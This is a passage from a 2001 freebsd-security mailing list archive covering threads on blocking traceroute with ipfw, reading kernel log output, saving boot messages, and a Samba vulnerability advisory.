Simply use ipfw > icmptype to block all MS attempts > > Ryan > > > > someone else using ttl=1? that's sux.. oh well i guess its imposible to > > disable it.. cuz i dont want to block something that should work.. > > > > thanks everyone > > > > ----- Original Message ----- > > From: "Peter Pentchev" > > To: "alexus" > > Cc: "Simon Rakovec" ; > > Sent: Tuesday, June 26, 2001 1:58 AM > > Subject: Re: disable traceroute to my host > > > > > > > On Mon, Jun 25, 2001 at 04:00:03PM -0400, alexus wrote: > > > > i agree this is not a solution.. looks like tty=1 is best solution so > > far > > > > > > TTL=1 is not a general solution, because it only blocks traceroutes to > > this > > > particular host, not to any machines that it is acting as a gateway for. > > > > > > Moreover, TTL=1 is not a real-world solution, because some *legitimate* > > > packets might arrive with TTL=1 (yes, there are some OS's that set too > > > low TTL's on outgoing packets, and there are some global backbone ISP's > > > which have a *lot* of routers, so it is possible that a normal packet > > > destined for your host should reach you with TTL=1). > > > > > > And just btw.. Really, why do you want to block traceroutes? > > > > > > G'luck, > > > Peter > > > > > > -- > > > because I didn't think of a good beginning of it. > > > > > > > ----- Original Message ----- > > > > From: "Peter Pentchev" > > > > To: "Simon Rakovec" > > > > Cc: > > > > Sent: Monday, June 25, 2001 2:37 AM > > > > Subject: Re: disable traceroute to my host > > > > > > > > > > > > > On Sun, Jun 24, 2001 at 07:42:19PM +0200, Simon Rakovec wrote: > > > > > > Try this: > > > > > > > > > > > > ipfw add deny udp from any 32769-65535 to 33434-33523 > > > > > > > > > > As Karsten noted in a followup, this is not proper network practice. > > > > > There might be a LOT of things listening on those UDP ports, > including > > > > > ephemeral outgoing UDP connections. > > > > > > > > > > As many other people noted, this does not stop Windows traceroute, > > > > > which goes via ICMP. > > > > > > > > > > As the traceroute(8) manpage notes, this does not stop people who > > > > > know how to use the traceroute '-p port' option to select a starting > > > > > port != 32768. > > > > > > > > > > As Dag-Erling Smoerdgrav noted, in general it is impossible to > disable > > > > > a person determined to traceroute you, and in practice, there is > > > > > no need to. > > > > > > > > > > G'luck, > > > > > Peter > > > > > > > > > > PS. How was that now... one source: plagiarism, two sources: > > comparative > > > > > study, three sources: an academic thesis.. I did even better than > > that! > > > > ;) > > > > > > > > > > -- > > > > > Thit sentence is not self-referential because "thit" is not a word. > > > > > > > > > > > alexus wrote: > > > > > > > > > > > > > > is it possible to disable using ipfw so people won't be able to > > > > traceroute > > > > > > > me? > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 22:17:38 2001 Delivered-To: freebsd-security@freebsd.org Received: from hawk.mail.pas.earthlink.net (hawk.mail.pas.earthlink.net [207.217.120.22]) by hub.freebsd.org (Postfix) with ESMTP id 151BA37B407 for ; Wed, 27 Jun 2001 22:17:35 -0700 (PDT) (envelope-from cjc@earthlink.net) Received: from blossom.cjclark.org (dialup-209.244.106.34.Dial1.SanJose1.Level3.net [209.244.106.34]) by hawk.mail.pas.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id WAA16697; Wed, 27 Jun 2001 22:17:23 -0700 (PDT) Received: (from cjc@localhost) by blossom.cjclark.org (8.11.4/8.11.3) id f5S5Fha00910; Wed, 27 Jun 2001 22:15:43 -0700 (PDT) (envelope-from cjc) Date: Wed, 27 Jun 2001 22:15:43 -0700 From: "Crist J. Clark" To: alexus Cc: Ryan Masse , freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Message-ID: <20010627221543.A346@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <001101c0ff3d$ca013aa0$01000001@book>; from ml@db.nexgen.com on Wed, Jun 27, 2001 at 03:17:21PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Wed, Jun 27, 2001 at 03:17:21PM -0400, alexus wrote: > sounds good.. although what is tcp there for? You can traceroute with any protocol. TCP is just as easy as UDP. As people keep saying over and over, there really is no way to stop traceroutes without severely breaking things. If you really want to stop traceroutes, pull the plug. Can this thread die now? -- Crist J. Clark cjclark@alum.mit.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jun 27 23:29:55 2001 Delivered-To: freebsd-security@freebsd.org Received: from roulen-gw.morning.ru (roulen-gw.morning.ru [195.161.98.242]) by hub.freebsd.org (Postfix) with ESMTP id B24F737B401 for ; Wed, 27 Jun 2001 23:29:51 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (seven.ld [192.168.11.7]) by roulen-gw.morning.ru (Postfix) with ESMTP id E1BE118; Thu, 28 Jun 2001 14:29:49 +0800 (KRAST) Date: Thu, 28 Jun 2001 14:30:21 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <198504028264.20010628143021@morning.ru> To: "Crist J. Clark" Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: disable traceroute to my host In-Reply-To: <20010627221543.A346@blossom.cjclark.org> References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> <20010627221543.A346@blossom.cjclark.org> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > On Wed, Jun 27, 2001 at 03:17:21PM -0400, alexus wrote: >> sounds good.. although what is tcp there for? > You can traceroute with any protocol. TCP is just as easy as UDP. > As people keep saying over and over, there really is no way to stop > traceroutes without severely breaking things. I disagree. cause don't see any real hurt of disallowing icmp-echo-reply (0), icmp-unreach.icmp-unreach-port (3.3) and icmp-timxceed (11). the first is already in relatively common practice the second is similar to blackhole BSD's feature (yeah... it doesn't fit RFC, but the cruel world ;) the third is just an informative message (like the second isn't RFC-compilant but partially) In sum we can just complain bout non RFC-behavior.... but at the other side we're to understand that playing according to the rules is too expensive while others don't bother with. Already mentioned stealth routing (ok, forwarding, if the difference kick in eye ;) isn't RFC-compilant and what? "...Who ever promised anybody equal share?..." > If you really want to stop traceroutes, pull the plug. extreme? ;) > Can this thread > die now? 18 * * * 19 * * * 20 * * * 21 * * * ^C p.s. ;))) -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 1: 6:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from ringworld.nanolink.com (ringworld.nanolink.com [195.24.48.13]) by hub.freebsd.org (Postfix) with SMTP id 2944737B403 for ; Thu, 28 Jun 2001 01:06:35 -0700 (PDT) (envelope-from roam@orbitel.bg) Received: (qmail 80855 invoked by uid 1000); 28 Jun 2001 08:11:20 -0000 Date: Thu, 28 Jun 2001 11:11:20 +0300 From: Peter Pentchev To: Igor Podlesny Cc: "Crist J. Clark" , freebsd-security@FreeBSD.ORG Subject: Re: disable traceroute to my host Message-ID: <20010628111119.C80342@ringworld.oblivion.bg> Mail-Followup-To: Igor Podlesny , "Crist J. Clark" , freebsd-security@FreeBSD.ORG References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> <20010627221543.A346@blossom.cjclark.org> <198504028264.20010628143021@morning.ru> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <198504028264.20010628143021@morning.ru>; from poige@morning.ru on Thu, Jun 28, 2001 at 02:30:21PM +0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 28, 2001 at 02:30:21PM +0700, Igor Podlesny wrote: > > > On Wed, Jun 27, 2001 at 03:17:21PM -0400, alexus wrote: > >> sounds good.. although what is tcp there for? > > > You can traceroute with any protocol. TCP is just as easy as UDP. > > > As people keep saying over and over, there really is no way to stop > > traceroutes without severely breaking things. > > I disagree. cause don't see any real hurt of disallowing > icmp-echo-reply (0), icmp-unreach.icmp-unreach-port (3.3) and > icmp-timxceed (11). > > the first is already in relatively common practice This is acceptable, although it might confuse somebody who's new to the hostile world of the today's Internet :) > the second is similar to blackhole BSD's feature (yeah... it doesn't > fit RFC, but the cruel world ;) ..and if you are running an UDP service, it would confuse the hell out of people unable to connect to it when the server is down. > the third is just an informative message (like the second isn't > RFC-compilant but partially) ..an informative message that can tell somebody exactly why they can't connect to your system, instead of having their connections just hang. As I mentioned before, there *are* OS's which will set stupidly low TTL's on outgoing packets. G'luck, Peter -- This sentence would be seven words long if it were six words shorter. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 1:49:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from roulen-gw.morning.ru (roulen-gw.morning.ru [195.161.98.242]) by hub.freebsd.org (Postfix) with ESMTP id E753E37B403 for ; Thu, 28 Jun 2001 01:49:21 -0700 (PDT) (envelope-from poige@morning.ru) Received: from NIC1 (seven.ld [192.168.11.7]) by roulen-gw.morning.ru (Postfix) with ESMTP id 0B5E12D; Thu, 28 Jun 2001 16:49:20 +0800 (KRAST) Date: Thu, 28 Jun 2001 16:49:52 +0700 From: Igor Podlesny X-Mailer: The Bat! (v1.52 Beta/7) UNREG / CD5BF9353B3B7091 Organization: Morning Network X-Priority: 3 (Normal) Message-ID: <65512399821.20010628164952@morning.ru> To: Peter Pentchev Cc: freebsd-security@FreeBSD.ORG Subject: Re[2]: disable traceroute to my host In-Reply-To: <20010628111119.C80342@ringworld.oblivion.bg> References: <006a01c0fb6b$2d64d830$9865fea9@book> <3B36267B.5B5FDBE@inforta.com> <20010625093731.A934@ringworld.oblivion.bg> <01ec01c0fdb1$6c9cada0$9865fea9@book> <20010626085804.E780@ringworld.oblivion.bg> <002701c0fe76$7530eab0$01000001@book> <003401c0fe93$a3f405e0$3200a8c0@Home> <001101c0ff3d$ca013aa0$01000001@book> <20010627221543.A346@blossom.cjclark.org> <198504028264.20010628143021@morning.ru> <20010628111119.C80342@ringworld.oblivion.bg> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > This is acceptable, although and this is the point where everybody makes the choice ;) (I'd like to underline that the original question wasn't "is it worth doing", right?) -- Igor mailto:poige@morning.ru To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 6:40:24 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns2.sysadmin-inc.com (ns2.sysadmin-inc.com [209.16.228.145]) by hub.freebsd.org (Postfix) with SMTP id E284F37B403 for ; Thu, 28 Jun 2001 06:40:20 -0700 (PDT) (envelope-from peter@sysadmin-inc.com) Received: (qmail 89185 invoked by alias); 28 Jun 2001 13:40:20 -0000 Received: from unknown (HELO 98wkst) (10.10.1.70) by ns2.sysadmin-inc.com with SMTP; 28 Jun 2001 13:40:20 -0000 From: "Peter Brezny" To: Subject: security check output, kernel log message Date: Thu, 28 Jun 2001 09:39:34 -0400 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I received this kernel log message this morning > 5.255.255:137 in via xl1 What does this mean? Peter Brezny SysAdmin Services Inc. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 6:44:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from kawoserv.kawo2.rwth-aachen.de (kawoserv.kawo2.RWTH-Aachen.DE [134.130.180.1]) by hub.freebsd.org (Postfix) with ESMTP id 1EADC37B406 for ; Thu, 28 Jun 2001 06:44:52 -0700 (PDT) (envelope-from alex@fump.kawo2.rwth-aachen.de) Received: from fump.kawo2.rwth-aachen.de (root@fump.kawo2.rwth-aachen.de [134.130.181.148]) by kawoserv.kawo2.rwth-aachen.de (8.9.3/8.9.3) with ESMTP id PAA10728; Thu, 28 Jun 2001 15:44:50 +0200 Received: (from alex@localhost) by fump.kawo2.rwth-aachen.de (8.11.3/8.11.3) id f5SDjUE96354; Thu, 28 Jun 2001 15:45:30 +0200 (CEST) (envelope-from alex) Date: Thu, 28 Jun 2001 15:45:29 +0200 From: Alexander Langer To: Peter Brezny Cc: freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628154529.A96323@fump.kawo2.rwth-aachen.de> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from peter@sysadmin-inc.com on Thu, Jun 28, 2001 at 09:39:34AM -0400 X-PGP-Fingerprint: 44 28 CA 4C 46 5B D3 A8 A8 E3 BA F3 4E 60 7D 7F X-PGP-at: finger alex@big.endian.de X-Verwirrung: Dieser Header dient der allgemeinen Verwirrung. Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thus spake Peter Brezny (peter@sysadmin-inc.com): > > 5.255.255:137 in via xl1 > What does this mean? That is a truncated log from another day. Alex To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 8: 8:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id DDEA137B405 for ; Thu, 28 Jun 2001 08:08:48 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.30 #1) id 15FdMj-0000NJ-00; Thu, 28 Jun 2001 17:05:57 +0200 From: Sheldon Hearn To: Alexander Langer Cc: Peter Brezny , freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message In-reply-to: Your message of "Thu, 28 Jun 2001 15:45:29 +0200." <20010628154529.A96323@fump.kawo2.rwth-aachen.de> Date: Thu, 28 Jun 2001 17:05:57 +0200 Message-ID: <1444.993740757@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 28 Jun 2001 15:45:29 +0200, Alexander Langer wrote: > > > 5.255.255:137 in via xl1 > > What does this mean? > > That is a truncated log from another day. What I've wondered for a while is how to flush that out so I stop getting it in my daily security check output. I still have a load of 'em left over from when I turned log_in_vain on a few weeks ago. Ciao, Sheldon. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 8:26:35 2001 Delivered-To: freebsd-security@freebsd.org Received: from imr2.ericy.com (imr2.ericy.com [12.34.240.68]) by hub.freebsd.org (Postfix) with ESMTP id B50F137B407 for ; Thu, 28 Jun 2001 08:26:31 -0700 (PDT) (envelope-from Antoine.Beaupre@ericsson.ca) Received: from mr6.exu.ericsson.se (mr6att.ericy.com [138.85.92.14]) by imr2.ericy.com (8.11.3/8.11.3) with ESMTP id f5SFQZB09507 for ; Thu, 28 Jun 2001 10:26:35 -0500 (CDT) Received: from noah.lmc.ericsson.se (noah.lmc.ericsson.se [142.133.1.1]) by mr6.exu.ericsson.se (8.11.3/8.11.3) with ESMTP id f5SFQUF02973 for ; Thu, 28 Jun 2001 10:26:30 -0500 (CDT) Received: from lmc35.lmc.ericsson.se (lmc35.lmc.ericsson.se [142.133.16.175]) by noah.lmc.ericsson.se (8.11.2/8.9.2) with ESMTP id f5SFQTG18130 for ; Thu, 28 Jun 2001 11:26:29 -0400 (EDT) Received: by lmc35.lmc.ericsson.se with Internet Mail Service (5.5.2653.19) id ; Thu, 28 Jun 2001 11:26:28 -0400 Received: from lmc.ericsson.se (lmcpc100455.pc.lmc.ericsson.se [142.133.23.150]) by LMC37.lmc.ericsson.se with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id NZTGB1MS; Thu, 28 Jun 2001 11:26:24 -0400 From: "Antoine Beaupre (LMC)" To: freebsd-security@FreeBSD.ORG Message-ID: <3B3B4C9E.5010800@lmc.ericsson.se> Date: Thu, 28 Jun 2001 11:26:22 -0400 Organization: LMC, Ericsson Research Canada User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.1) Gecko/20010607 X-Accept-Language: en,fr-CA,fr MIME-Version: 1.0 Subject: Re: security check output, kernel log message References: <1444.993740757@axl.seasidesoftware.co.za> Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I also had my share of "trouble" with that. Sometimes, it's strictly impossible to have boot dmesg. The kernel dmesg buffer gets overflown, this is understandable. But /var/log/dmesg.today *also* gets trashed. isn't there a nice little file somewhere that keeps *boot* (not console!) messages? A. Sheldon Hearn wrote: > On Thu, 28 Jun 2001 15:45:29 +0200, Alexander Langer wrote: > > >>>>5.255.255:137 in via xl1 >>>> >>>What does this mean? >>> >>That is a truncated log from another day. >> > > What I've wondered for a while is how to flush that out so I stop > getting it in my daily security check output. I still have a load of > 'em left over from when I turned log_in_vain on a few weeks ago. > > Ciao, > Sheldon. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- Antoine Beaupré Jambala TCM team Ericsson Canada inc. mailto:antoine.beaupre@ericsson.ca To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 10: 3: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 1F97237B414 for ; Thu, 28 Jun 2001 10:02:50 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15Ff8k-000E1p-00; Thu, 28 Jun 2001 17:59:38 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f5SGxce91371; Thu, 28 Jun 2001 17:59:38 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Thu, 28 Jun 2001 17:59:38 +0100 From: Ben Smithurst To: "Antoine Beaupre (LMC)" Cc: freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628175938.H83829@strontium.shef.vinosystems.com> References: <1444.993740757@axl.seasidesoftware.co.za> <3B3B4C9E.5010800@lmc.ericsson.se> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <3B3B4C9E.5010800@lmc.ericsson.se> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Antoine Beaupre (LMC) wrote: > I also had my share of "trouble" with that. Sometimes, it's strictly > impossible to have boot dmesg. The kernel dmesg buffer gets overflown, > this is understandable. But /var/log/dmesg.today *also* gets trashed. > > isn't there a nice little file somewhere that keeps *boot* (not > console!) messages? /var/run/dmesg.boot -- Ben Smithurst / ben@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 12:25:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from stimpy.net (adsl-63-193-11-3.dsl.snfc21.pacbell.net [63.193.11.3]) by hub.freebsd.org (Postfix) with ESMTP id 86EBE37B407; Thu, 28 Jun 2001 12:25:31 -0700 (PDT) (envelope-from jgross@stimpy.net) Received: by stimpy.net (Postfix, from userid 314) id 4C88F300EB; Thu, 28 Jun 2001 12:25:19 -0700 (PDT) Date: Thu, 28 Jun 2001 12:25:19 -0700 From: Joe Gross To: Ben Smithurst Cc: "Antoine Beaupre (LMC)" , freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628122519.A79443@felix.stimpy.net> References: <1444.993740757@axl.seasidesoftware.co.za> <3B3B4C9E.5010800@lmc.ericsson.se> <20010628175938.H83829@strontium.shef.vinosystems.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20010628175938.H83829@strontium.shef.vinosystems.com>; from ben@FreeBSD.org on Thu, Jun 28, 2001 at 05:59:38PM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, Jun 28, 2001 at 05:59:38PM +0100, Ben Smithurst wrote: > > isn't there a nice little file somewhere that keeps *boot* (not > > console!) messages? > > /var/run/dmesg.boot (quickly drifting OT) From /etc/rc: # Keep a copy of the boot messages around dmesg >/var/run/dmesg.boot Unfortunately in my case the dmesg buffer is too small so I miss all the meaty early boot messages. Is this a settable option or is there some other way to have all the boot messages saved without a serial console? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 12:35: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from scientia.demon.co.uk (scientia.demon.co.uk [212.228.14.13]) by hub.freebsd.org (Postfix) with ESMTP id 2C07A37B405 for ; Thu, 28 Jun 2001 12:35:00 -0700 (PDT) (envelope-from ben@FreeBSD.org) Received: from strontium.shef.vinosystems.com ([192.168.91.36] ident=root) by scientia.demon.co.uk with esmtp (Exim 3.30 #1) id 15FhZ4-000Hzm-00; Thu, 28 Jun 2001 20:34:58 +0100 Received: (from ben@localhost) by strontium.shef.vinosystems.com (8.11.4/8.11.4) id f5SJYvh80266; Thu, 28 Jun 2001 20:34:57 +0100 (BST) (envelope-from ben@FreeBSD.org) X-Authentication-Warning: strontium.shef.vinosystems.com: ben set sender to ben@FreeBSD.org using -f Date: Thu, 28 Jun 2001 20:34:57 +0100 From: Ben Smithurst To: Joe Gross Cc: freebsd-security@FreeBSD.ORG Subject: Re: security check output, kernel log message Message-ID: <20010628203457.B57299@strontium.shef.vinosystems.com> References: <1444.993740757@axl.seasidesoftware.co.za> <3B3B4C9E.5010800@lmc.ericsson.se> <20010628175938.H83829@strontium.shef.vinosystems.com> <20010628122519.A79443@felix.stimpy.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010628122519.A79443@felix.stimpy.net> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Joe Gross wrote: > (quickly drifting OT) > >> From /etc/rc: > > # Keep a copy of the boot messages around > dmesg >/var/run/dmesg.boot > > Unfortunately in my case the dmesg buffer is too small so I miss all the > meaty early boot messages. Is this a settable option or is there some other > way to have all the boot messages saved without a serial console? This might be what you want, I've never tried it though: # Size of the kernel message buffer. Should be N * pagesize. options MSGBUF_SIZE=40960 -- Ben Smithurst / ben@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 16:15: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id CAA7D37B409 for ; Thu, 28 Jun 2001 16:14:59 -0700 (PDT) (envelope-from rmasse@mastery.ca) Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5SNEwQ06572 for ; Thu, 28 Jun 2001 19:14:58 -0400 (EDT) (envelope-from rmasse@mastery.ca) Message-ID: <004b01c10027$ca9b8980$3200a8c0@Home> From: "Ryan Masse" To: "FreeBSD-Security" Subject: samba vulnerability Date: Thu, 28 Jun 2001 19:12:22 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org How come there hasen't been a security advisory about the latest possible remote root comprise found in all samba versions prior to 2.0.10? http://us1.samba.org/samba/whatsnew/macroexploit.html Ryan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 16:38:56 2001 Delivered-To: freebsd-security@freebsd.org Received: from aristotle.tamu.edu (Aristotle.tamu.edu [165.91.161.90]) by hub.freebsd.org (Postfix) with ESMTP id 5ABB037B403 for ; Thu, 28 Jun 2001 16:38:54 -0700 (PDT) (envelope-from rasmith@aristotle.tamu.edu) Received: from aristotle.tamu.edu (IDENT:rasmith@localhost [127.0.0.1]) by aristotle.tamu.edu (8.9.3/8.8.7) with ESMTP id SAA31931 for ; Thu, 28 Jun 2001 18:38:53 -0500 Message-Id: <200106282338.SAA31931@aristotle.tamu.edu> To: freebsd-security@FreeBSD.ORG Subject: Re: samba vulnerability In-Reply-To: Your message of "Thu, 28 Jun 2001 19:12:22 EDT." <004b01c10027$ca9b8980$3200a8c0@Home> Mime-Version: 1.0 (generated by tm-edit 7.106) Content-Type: text/plain; charset=US-ASCII Date: Thu, 28 Jun 2001 18:38:53 -0500 From: Robin Smith Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >>Ryan Masse wrote: > How come there hasen't been a security advisory about the > latest possible remote root comprise found in all samba > versions prior to 2.0.10? There has been, and the samba port installs by default with log file names of the form "log.%m". To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Jun 28 17:31:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from comp1.mastery.ca (comp1.mastery.ca [209.202.88.60]) by hub.freebsd.org (Postfix) with ESMTP id AA29037B409 for ; Thu, 28 Jun 2001 17:31:08 -0700 (PDT) (envelope-from mail@max-info.net) Received: from 78kw954 (dyn216-8-131-5.ADSL.mnsi.net [216.8.131.5]) (authenticated) by comp1.mastery.ca (8.11.3/8.11.1) with ESMTP id f5T0TbQ06685; Thu, 28 Jun 2001 20:29:41 -0400 (EDT) (envelope-from mail@max-info.net) Message-ID: <005e01c10032$374ad360$3200a8c0@Home> From: "Ryan Masse" To: "Robin Smith" Cc: "FreeBSD-Security" References: <200106282338.SAA31931@aristotle.tamu.edu> Subject: Re: samba vulnerability Date: Thu, 28 Jun 2001 20:26:56 -0400 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) 